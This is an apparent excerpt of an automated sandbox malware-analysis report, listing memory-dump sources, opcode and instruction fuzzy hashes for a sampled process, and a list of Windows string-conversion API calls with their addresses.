                                                                                                                        • Instruction Fuzzy Hash: 2741F170E01219CFEB58DFAAD84469EBBF2FF89304F64D06AD418AB254EB345942CF54
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108207853.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_6420000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 52bc53c5267fb0220d987bb34c8eb62f6aee9c6e0d579c3766b998dd2c93e5e8
                                                                                                                        • Instruction ID: 60089d4fbc55766534904e0134287fdfe26ac320c06307ef2c3dfbc034eeddf0
                                                                                                                        • Opcode Fuzzy Hash: 52bc53c5267fb0220d987bb34c8eb62f6aee9c6e0d579c3766b998dd2c93e5e8
                                                                                                                        • Instruction Fuzzy Hash: 9941F570D002588BEB59DFAAC8506DEFBB2AF89300F60D02AD408BB354DB385946CF54
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108207853.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_6420000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d221885ae7ded9a752318edd8f3b02a708c86808270850aaecefc6fd4d04ad74
                                                                                                                        • Instruction ID: 78282b0b10d7f2eeb76cb32f7915521236126c232df17ba4fb5e7b4b334ae596
                                                                                                                        • Opcode Fuzzy Hash: d221885ae7ded9a752318edd8f3b02a708c86808270850aaecefc6fd4d04ad74
                                                                                                                        • Instruction Fuzzy Hash: B541F370E002188FDB98DFAAD8446DEBBF2BF89304F64D06AD418BB254EB355946CF54
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108207853.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_6420000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3308bf020f2f36c2f879f88ebf242473eff056863abca130eb8d6fec4309baf9
                                                                                                                        • Instruction ID: 5725ad11d265aca07432b41f9d08b3d1bb7c95f48d9388412868c16a804ed6e1
                                                                                                                        • Opcode Fuzzy Hash: 3308bf020f2f36c2f879f88ebf242473eff056863abca130eb8d6fec4309baf9
                                                                                                                        • Instruction Fuzzy Hash: 604115B0D002198FDB58DFAAD8506EEBBF2BF89300F64D06AD419BB254EB344946CF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108207853.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_6420000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 092121d7ef4d6235ea161a7bc9eea4485c3cbe16bf83f923f246e52610dc40ae
                                                                                                                        • Instruction ID: ffb377bc89b3a90f036c84217c5fe1830568d14412f9bb3bf13920ec1b629ab4
                                                                                                                        • Opcode Fuzzy Hash: 092121d7ef4d6235ea161a7bc9eea4485c3cbe16bf83f923f246e52610dc40ae
                                                                                                                        • Instruction Fuzzy Hash: F941F674D012188BEB58DFAAC8506DEFBF2AF89304F60D02AD519BB354EB345946CF54
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108207853.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_6420000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a08f1c25888d4ef5d30f1127101ea2fe16c77eda48a364c2e50f2c39889f0db3
                                                                                                                        • Instruction ID: 66b22dd356d5a7c2186cbff3647127ad7160899a17a256de32ebab4934e9061e
                                                                                                                        • Opcode Fuzzy Hash: a08f1c25888d4ef5d30f1127101ea2fe16c77eda48a364c2e50f2c39889f0db3
                                                                                                                        • Instruction Fuzzy Hash: 4B413470E012198FDB58DFAAD8446AEBBF2BF89300F60D06AC018BB354EB341942CF54
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108207853.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_6420000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7c9a37381915ab7f80dec581c05207f521cb70293307cdf3093dfaf1175f468f
                                                                                                                        • Instruction ID: 23e2c613765bb6c16099100c00349c69b37e511f7fe9252f616020245243fd8b
                                                                                                                        • Opcode Fuzzy Hash: 7c9a37381915ab7f80dec581c05207f521cb70293307cdf3093dfaf1175f468f
                                                                                                                        • Instruction Fuzzy Hash: 3741E370D012198FDB58DFAAD8447AEBBF2BF89300F64D06AD418BB254EB345982CF54
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108207853.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_6420000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a1618d90ec43f2bf2e789245409569b2a02697ee7df0762780ca359f2b5bc10a
                                                                                                                        • Instruction ID: 16685ca2c81eb0e8263ac722f49f4290f1109a3cb672ced9db197ef9a7dd8d9c
                                                                                                                        • Opcode Fuzzy Hash: a1618d90ec43f2bf2e789245409569b2a02697ee7df0762780ca359f2b5bc10a
                                                                                                                        • Instruction Fuzzy Hash: 0B41E670E042588BEB58DFAAC8406DDFBF2EF89300F64D06AC458AB258DB345946CF44
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108207853.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_6420000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 74093c3b503def3f4d33e9a292566187a57da1be22ffc973624c8e7e08012979
                                                                                                                        • Instruction ID: 43a0cc553fad4820d73cd6343effdde67cd917b586041246c08fa8d5eb515b95
                                                                                                                        • Opcode Fuzzy Hash: 74093c3b503def3f4d33e9a292566187a57da1be22ffc973624c8e7e08012979
                                                                                                                        • Instruction Fuzzy Hash: 9841E570E012598BEB48DFAAC8506DEFBF2AFC9300F64D02AD419BB254EB345946CF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108207853.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_6420000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a14d626f7853115dd6753e67e249f5e0771d3297662874c1bc9d303677b53b06
                                                                                                                        • Instruction ID: 9a473a6a0d4449fb18265aa55b6881212e183db033e4080d0ec9ce9336881fa0
                                                                                                                        • Opcode Fuzzy Hash: a14d626f7853115dd6753e67e249f5e0771d3297662874c1bc9d303677b53b06
                                                                                                                        • Instruction Fuzzy Hash: 39410670E012198FDB98DFAAD8946EEBBF2BF89300F20D06AD418B7254DB344942CF40
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108207853.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_6420000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f797e0e5604691f02e8908cba17a2407da3f10bdb2bbd99f6b0cc5300e50d927
                                                                                                                        • Instruction ID: f57f1bcd7e296e6c716d339d0bf246c1f3b7ad89dcbdfb26fc82a88b57af01c0
                                                                                                                        • Opcode Fuzzy Hash: f797e0e5604691f02e8908cba17a2407da3f10bdb2bbd99f6b0cc5300e50d927
                                                                                                                        • Instruction Fuzzy Hash: CC41F474D012198FDB58DFAAD8446DEBBF2BF89310F60D06AD418AB364EB345942CF54
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108207853.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_6420000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9921f6eb4920bf8b099a86ae350137e775de530c69f157ccc0af221ffd5fff42
                                                                                                                        • Instruction ID: c20d51ae54f6102a9961eff7e63ea991d60e99b29fc3abd27cf66e2c532fc286
                                                                                                                        • Opcode Fuzzy Hash: 9921f6eb4920bf8b099a86ae350137e775de530c69f157ccc0af221ffd5fff42
                                                                                                                        • Instruction Fuzzy Hash: 8D41F670E012588BEB58DFAAD8506DEFBF2BF89300F64D02AD419BB254EB345946CF54
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108207853.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_6420000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9ccc6fcb2b8e69d11b0a86b874b5960df87a16a0ef44af7c9b8524fde6c2022c
                                                                                                                        • Instruction ID: 55a518543300f2b1a226dddf7e717c24b07fdbf898c166d01c5990c423575ed2
                                                                                                                        • Opcode Fuzzy Hash: 9ccc6fcb2b8e69d11b0a86b874b5960df87a16a0ef44af7c9b8524fde6c2022c
                                                                                                                        • Instruction Fuzzy Hash: 83410770D012198FEB58DFAAD8446DEBBF2BF89300F60D16AD418BB254EB345946CF54
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108207853.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_6420000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 54e62d8da333ec9022c5798f85f16a00cc835cd83be14191b50816c427becb46
                                                                                                                        • Instruction ID: f614565e056fd43031ede99f8f95a897cae0a5ad6d10803a79625cc59916efe4
                                                                                                                        • Opcode Fuzzy Hash: 54e62d8da333ec9022c5798f85f16a00cc835cd83be14191b50816c427becb46
                                                                                                                        • Instruction Fuzzy Hash: 3C41D270D012198FDB58DFAAD9406EEBBF2AF89300F64D06AC459BB254DB344982CF54
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108207853.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_6420000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: fdcbce1e4f136c905366ce05715e38f522beb779d65d3eddb6760424839694cd
                                                                                                                        • Instruction ID: 5a19d6880c6aff3ac270f1005d2906878b23e1734fc48e0a3c4d425415840dde
                                                                                                                        • Opcode Fuzzy Hash: fdcbce1e4f136c905366ce05715e38f522beb779d65d3eddb6760424839694cd
                                                                                                                        • Instruction Fuzzy Hash: 9841E5B4D012188FDB98DFAAD9446DEBBF2BF89300F64D06AD418BB254EB344946CF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108207853.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_6420000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6b296074929e3845a208cf8fbe63883e7449ea23992d064df6357da13aeefc74
                                                                                                                        • Instruction ID: b2e8fb5fe2ce38793fe75354e2594c6b1d414b91dd12a934cb0bea41dccaba23
                                                                                                                        • Opcode Fuzzy Hash: 6b296074929e3845a208cf8fbe63883e7449ea23992d064df6357da13aeefc74
                                                                                                                        • Instruction Fuzzy Hash: 9441E070E012198FDB98DFAAD84469EBBF2BF89304F60D06AD418AB354EB344946CF54
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108207853.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_6420000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 89de6712b28a9a1acc8cb709ba41167e87806d66e1351b5324962fb2d3c2d4a5
                                                                                                                        • Instruction ID: 3e38df1172db04632d0de2c262004a25024b29f364fa47184a061ee9bb74a82f
                                                                                                                        • Opcode Fuzzy Hash: 89de6712b28a9a1acc8cb709ba41167e87806d66e1351b5324962fb2d3c2d4a5
                                                                                                                        • Instruction Fuzzy Hash: 6C41E470E002188FDB58DFAAD84069EBBF2BF89304F64D06AD418BB254EB345942CF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108207853.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_6420000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8d2eb65d09d1c6bca23a28a7b1f8c60a64b068bed14991dd8e47e0f0100478c1
                                                                                                                        • Instruction ID: e605651c668d23cde52f59410dc830f5f30a4597c13228eb7078f3b51b57f12d
                                                                                                                        • Opcode Fuzzy Hash: 8d2eb65d09d1c6bca23a28a7b1f8c60a64b068bed14991dd8e47e0f0100478c1
                                                                                                                        • Instruction Fuzzy Hash: E441D2B0D002198FDB98DFAAD8546DEBBF2BF88300F64D06AD419BB254EB345946CF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108207853.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_6420000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2a34165d804324ffcbed582fb476a18119eabcaf878f3a28e930234dc04550e8
                                                                                                                        • Instruction ID: 8c0662d39672bea78b8a4083faba464beaf79fc3eafd1ed0aa398810ff92ca85
                                                                                                                        • Opcode Fuzzy Hash: 2a34165d804324ffcbed582fb476a18119eabcaf878f3a28e930234dc04550e8
                                                                                                                        • Instruction Fuzzy Hash: 7141E774E012198BDB98DFAAD8847EEBBF2BF89300F60D06AD019B7254DB344942CF54
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108207853.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_6420000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ed97abcccb85efa34678f70f72569405d6341ecfd3adae9400b9c338c87b1281
                                                                                                                        • Instruction ID: 4c4318d3e46fd25e26dababa5e57ac7ebc1c4736f76329b38ffb5f776edbee0d
                                                                                                                        • Opcode Fuzzy Hash: ed97abcccb85efa34678f70f72569405d6341ecfd3adae9400b9c338c87b1281
                                                                                                                        • Instruction Fuzzy Hash: D741DF70E012198BEB58DFAAD8446DEFBF2BF89300F64D06AD458AB254EB345942CF54
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108207853.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_6420000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 47158eb4d556e00698e36c99750b555d04763c039d9171da8becc73b98efe10a
                                                                                                                        • Instruction ID: 00518ad2dd2ded66d94bf7bda7ffbd024b294c51f6cee2dbb2a961e1be27c6f6
                                                                                                                        • Opcode Fuzzy Hash: 47158eb4d556e00698e36c99750b555d04763c039d9171da8becc73b98efe10a
                                                                                                                        • Instruction Fuzzy Hash: AF410270E002588FDB58DFAAD8446DDBBF2BF89300F64D06AC458BB254EB344942CF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108207853.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_6420000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 12ba3891ba31a4e16b3e75ef087d61a5d57a1bed809471f5de75a19bdda90fc5
                                                                                                                        • Instruction ID: 89f360260360385a238c9ca47ad3cdbab33cb4b0524558f2c77a0f4da60428e0
                                                                                                                        • Opcode Fuzzy Hash: 12ba3891ba31a4e16b3e75ef087d61a5d57a1bed809471f5de75a19bdda90fc5
                                                                                                                        • Instruction Fuzzy Hash: 0D41F370E012198FDB98DFAAD8446EEBBF2BF88300F64D16AD419BB254DB344946CF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108207853.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_6420000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ad994ca9475e246de8e633601e1817e50eb6b414b434deb49be36607451cf660
                                                                                                                        • Instruction ID: fed0dfde9c4a22fc0ead3f76f1e7c065d09b198f949778fc645d297bb98bf688
                                                                                                                        • Opcode Fuzzy Hash: ad994ca9475e246de8e633601e1817e50eb6b414b434deb49be36607451cf660
                                                                                                                        • Instruction Fuzzy Hash: 2041E270E002188BDB58DFAAD8546EEBBF2BF89304F64D06AC458BB254DB345942CF54
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108207853.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_6420000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9b4098fb191d0bc5fb5d1496bc56ccd332612923ec7c656dd9cc23807976d787
                                                                                                                        • Instruction ID: bf8da986625960f87865a13c490bf51c52f0cadc838bcce8029ead742a44da92
                                                                                                                        • Opcode Fuzzy Hash: 9b4098fb191d0bc5fb5d1496bc56ccd332612923ec7c656dd9cc23807976d787
                                                                                                                        • Instruction Fuzzy Hash: E141E4B0E002198FDB48DFAAD84069EBBF2BF88300F64D02AC418BB254EB345942CF54
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108207853.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_6420000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 29d277637478676529a2a161253ef2829b5c276555fb92d920ea7424903b78f1
                                                                                                                        • Instruction ID: f31a3d82e87de9a0b43fd2cf3efb37fa4ee7a93d1255b9646179be11894e96b7
                                                                                                                        • Opcode Fuzzy Hash: 29d277637478676529a2a161253ef2829b5c276555fb92d920ea7424903b78f1
                                                                                                                        • Instruction Fuzzy Hash: B741E470E012198FDB58DFAAD8546EEBBF2BF89300F20D02AD419BB254DB345942CF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108207853.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_6420000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c463231dfb9fe0eb5a781659154f1ff1a92e81e8bc840313c352d939ebaa0519
                                                                                                                        • Instruction ID: 856ff8d8b0f596b97c1598a95e057620ab31696abd3824c514a8b42fceb75eea
                                                                                                                        • Opcode Fuzzy Hash: c463231dfb9fe0eb5a781659154f1ff1a92e81e8bc840313c352d939ebaa0519
                                                                                                                        • Instruction Fuzzy Hash: EC41E2B4E012198FDB58DFAAD8546DEBBF2BF88300F64D02AD419BB254EB345942CF54
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108207853.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_6420000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: dd6d47167a3f825d0443dacbc833b1210463a0d6dd9cbe3292a98e9cc21915d6
                                                                                                                        • Instruction ID: 40fb40d492912b327109a1a16acf3e5601244392e81b3aa37383e2dd6902bd4f
                                                                                                                        • Opcode Fuzzy Hash: dd6d47167a3f825d0443dacbc833b1210463a0d6dd9cbe3292a98e9cc21915d6
                                                                                                                        • Instruction Fuzzy Hash: 0B41E270E006198BDB58DFAAD8447AEBBF2BF88300F64D06AD419BB254EB345946CF40
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108207853.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_6420000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f088d2ad207b96eb18c9596e8286df230ca354b3865258b3392a3f2100d395bf
                                                                                                                        • Instruction ID: 75d3859378c22f1f9d325681772cb216e0dbea545284c0c84d708579b2f1e39d
                                                                                                                        • Opcode Fuzzy Hash: f088d2ad207b96eb18c9596e8286df230ca354b3865258b3392a3f2100d395bf
                                                                                                                        • Instruction Fuzzy Hash: AA41F774E01219CBDB58DFA6D9506EEBBF2AF89300F64D02AC419BB354DB345A46CF40
                                                                                                                        APIs
                                                                                                                        • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                                                        • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,021C1910), ref: 004170C5
                                                                                                                        • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                                                        • _malloc.LIBCMT ref: 0041718A
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                                                        • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                                                        • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                                                        • _malloc.LIBCMT ref: 0041724C
                                                                                                                        • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                                                        • __freea.LIBCMT ref: 004172A4
                                                                                                                        • __freea.LIBCMT ref: 004172AD
                                                                                                                        • ___ansicp.LIBCMT ref: 004172DE
                                                                                                                        • ___convertcp.LIBCMT ref: 00417309
                                                                                                                        • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                                                        • _malloc.LIBCMT ref: 00417362
                                                                                                                        • _memset.LIBCMT ref: 00417384
                                                                                                                        • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                                                        • ___convertcp.LIBCMT ref: 004173BA
                                                                                                                        • __freea.LIBCMT ref: 004173CF
                                                                                                                        • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4103914064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.4103897598.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103935605.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
